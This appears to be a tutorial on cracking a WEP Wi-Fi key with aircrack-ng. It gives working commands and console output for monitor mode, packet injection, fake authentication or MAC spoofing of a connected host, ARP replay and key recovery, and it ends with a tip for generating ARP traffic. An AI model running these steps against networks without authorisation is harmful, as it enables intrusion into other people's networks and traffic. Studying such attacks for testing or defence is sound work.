MAC address: e8:de:27:0c:f4:ec
Cell 04 - Address: 00:4F:62:17:6B:E3 Channel:11 Frequency:2.462 GHz (Channel 11) Quality=70/70 Signal level=-15 dBm Encryption key:on ESSID:"airlive" Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s 9 Mb/s; 12 Mb/s; 18 Mb/s Bit Rates:24 Mb/s; 36 Mb/s; 48 Mb/s; 54 Mb/s Mode:Master Extra:tsf=00000000bbb49101 Extra: Last beacon: 60ms ago IE: Unknown: 00076169726C697665 IE: Unknown: 010882848B960C121824 IE: Unknown: 03010B IE: Unknown: 2A0100 IE: Unknown: 32043048606C IE: Unknown: DD0700E04C01020300
1. Scan the available networks and their details:
iwlist wlan1 scan | less
Mark especially its MAC address and Channel, To match the frequency to the channel, check out: http://www.cisco.com/en/US/docs/wireless/technology/channel/deployment/guide/Channel.html#wp134132 . This will give you the frequency for each channel.
2. Shut down the network card from normal operation
airmon-ng stop wlan1
3. Start the itnerface in monitor mode
airmon-ng start wlan1 11
where 11 is the AP's channel.
wlan1 Atheros ath9k - [phy1] (monitor mode enabled on mon0) wlan0 Unknown iwlwifi - [phy0]
4. Test, that injection is working
aireplay-ng -9 -a 00:4F:62:17:6B:E3 wlan1
12:11:13 Waiting for beacon frame (BSSID: 00:4F:62:17:6B:E3) on channel 11 12:11:13 Trying broadcast probe requests... 12:11:13 Injection is working! 12:11:15 Found 1 AP 12:11:15 Trying directed probe requests... 12:11:15 00:4F:62:17:6B:E3 - channel: 11 - 'airlive' 12:11:15 Ping (min/avg/max): 1.105ms/6.782ms/17.021ms Power: -25.83 12:11:15 30/30: 100%
5. Start to capture the IV's. Open another console and run
airodump-ng -c 11 --bssid 00:4F:62:17:6B:E3 -w wifi_iv wlan1
where -c 11 is the AP's channel and -w wifi_iv prefix for the files with IV's.
6. In the meanwhile, you need to associate your MAC address with the AP in order to collect IV's. Use either fake authentization (see further) or MAC address of already-connected host.
aireplay-ng -1 6000 -o 1 -q 10 -a 00:4F:62:17:6B:E3 -h E8:DE:27:0C:F4:EC wlan1
where -1 is the fake authentization,
6000 means re-association every 6000 seconds,
-o 1 sends only one set of packets at a time; multiple can confuse some AP's
-q 10 keep sending alive packets every 10 s
-h E8:DE:27:0C:F4:EC is your MAC address of wlan1 or MAC of another already-connected host
7. Open another console and try to listen for ARP requests and re-inject them back to AP
aireplay-ng -3 -b 00:4F:62:17:6B:E3 -h E8:DE:27:0C:F4:EC wlan1
It will start listening for ARP requests and when it hears one, aireplay-ng will immediately start to inject it. See the Generating ARPs section for tricks on generating ARPs if your screen says “got 0 ARP requests” after waiting a long time.
You can confirm that you are injecting by checking your airodump-ng screen. The data packets should be increasing rapidly.
If you receive a message similar to “Got a deauth/disassoc packet. Is the source mac associated?”, this means you have lost association with the AP. All your injected packets will be ignored. You must return to the fake authentication step (Step 6) and successfully associate with the AP.
8. Run aircrack-ng to obtain the WEP key in a new console
aircrack-ng -b 00:4F:62:17:6B:E3 wifi_iv*.cap
You can also add
-n 64 if you know the key is only 64 bits long. This is a very quick PTW method, which is, however, usable only as long as you are able to collect ARP request/reply packets.
To use FMS/Korek method, you should add -K switch.
You can run this while generating packets. In a short time, the WEP key will be calculated and presented. For FMS/Korek, you will need approximately 250,000 IVs for 64 bit and 1,500,000 IVs for 128 bit keys. If you are using the PTW attack, then you will need about 20,000 packets for 64-bit and 40,000 to 85,000 packets for 128 bit. These are very approximate and there are many variables as to how many IVs you actually need to crack the WEP key.
Aircrack-ng 1.1 [00:06:18] Tested 4995588 keys (got 328514 IVs) KB depth byte(vote) 0 0/ 1 AB( 93) 20( 15) 48( 15) 58( 15) AE( 15) 1 0/ 3 CD( 84) 75( 63) 43( 47) 55( 26) 09( 22) 2 0/ 2 EF( 71) 8D( 70) B6( 30) 2F( 15) 37( 15) 3 0/ 1 12( 130) 01( 31) 7C( 30) 26( 29) E7( 28) KEY FOUND! [ AB:CD:EF:12:34 ] Decrypted correctly: 100%
In order for this tutorial to work, you must receive at least one ARP packet. On your home network, here is an easy way to generate an ARP packet. On a wired or wireless PC, ping a non-existent IP on your home LAN. A wired PC means a PC connected to your LAN via an ethernet cable. Lets say your home LAN address space is 192.168.1.1 through 192.168.1.254. Pick an IP between 1 and 254 which is not assigned to a network device. For example, if the IP 192.168.1.213 is not being used then “ping 192.168.1.213”. This will cause an ARP to be broadcast via your wireless access point and in turn, this will kick off the reinjection of packets by aireplay-ng.